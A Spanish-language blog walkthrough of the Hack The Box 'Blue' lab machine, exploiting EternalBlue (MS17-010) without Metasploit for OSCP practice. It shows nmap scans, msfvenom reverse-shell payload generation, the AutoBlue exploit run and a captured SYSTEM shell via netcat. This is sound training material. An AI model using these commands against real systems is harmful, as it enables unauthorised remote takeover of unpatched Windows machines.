Blue Hack the box. Eternal blue sin Metasploit en Español

by | Nov 4, 2019 | Blog, Herramientas / tools, OSCP

Ya había hecho esta maquina pero con mucho mucho Metasploit. La verdad es que solo para OSCP tiene sentido no usar metasploit para eternal blue ha. Lo bueno es que descubrí un script que es casi igual de maravilloso.

Como siempre empezamos con un nmap (en este caso dos)

root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:07 CET
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.67% done; ETC: 21:09 (0:00:00 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.024s latency).
Not shown: 991 closed ports
PORT  	STATE SERVICE  	VERSION
135/tcp   open  msrpc    	Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.09 seconds

Y para checar vulnerabilidades

root@Kali2:~/Downloads# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:06 CET
Nmap scan report for 10.10.10.40
Host is up (0.071s latency).

PORT	STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| 	State: VULNERABLE
| 	IDs:  CVE:CVE-2017-0143
| 	Risk factor: HIGH
|   	A critical remote code execution vulnerability exists in Microsoft SMBv1
|    	servers (ms17-010).
|      	 
| 	Disclosure date: 2017-03-14
| 	References:
|   	https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|   	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_  	https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 30.32 seconds

Ahora que sabemos que es vulnerable a eternalblue bajamos un scrip maravilloso

# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
root@Kali2:~/Downloads# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 102 (delta 12), reused 2 (delta 1), pack-reused 76
Receiving objects: 100% (102/102), 76.26 KiB | 780.00 KiB/s, done.
Resolving deltas: 100% (52/52), done.

Ahora generamos la shell

root@Kali2:~/Downloads# cd AutoBlue-MS17-010/shellcode/
root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
             	_.-;;-._
      	'-..-'|   ||   |
      	'-..-'|_.-;;-._|
      	'-..-'|   ||   |
      	'-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.9
LPORT you want x64 to listen on:
1234
LPORT you want x86 to listen on:
1235
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1235
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Ahora usamos el exploit para windows 7 (invalid_parameter es bueno… ja no se asusten)

root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# cd ..
root@Kali2:~/Downloads/AutoBlue-MS17-010# ls
eternalblue_exploit10.py  eternal_checker.py  mysmb.py   zzz_exploit.py
eternalblue_exploit7.py   LICENSE         	README.md
root@Kali2:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Y listo somos admin de Eternal blue sin usar metasploit 🙂